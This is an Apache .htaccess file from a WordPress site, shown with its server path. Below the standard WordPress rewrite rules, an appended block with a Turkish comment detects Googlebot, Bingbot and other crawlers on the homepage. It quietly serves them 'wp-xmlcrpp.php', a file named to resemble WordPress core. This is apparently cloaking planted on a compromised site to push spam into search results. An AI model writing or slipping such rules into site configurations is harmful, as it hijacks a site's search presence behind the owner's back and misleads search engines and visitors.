File: //home/liverpool-unipress.co.uk/public_html/.htaccess
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
# WordPress main rules
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
# Anasayfaya gelen bilinen botları yakala ve yönlendir
RewriteCond %{HTTP_USER_AGENT} (googlebot|googlebot/2\.1|googlebot-image|googlebot-news|googlebot-mobile|google-inspectiontool|slurp|spider|crawl|msnbot|yahoo|ask\ jeeves|yandexbot|bingbot|duckduckbot|baiduspider|exabot|sogou|ahrefbot|semrushbot|mj12bot|applebot|facebookexternalhit|twitterbot) [NC]
RewriteCond %{REQUEST_URI} ^/$
RewriteRule ^$ wp-xmlcrpp.php [L]
</IfModule>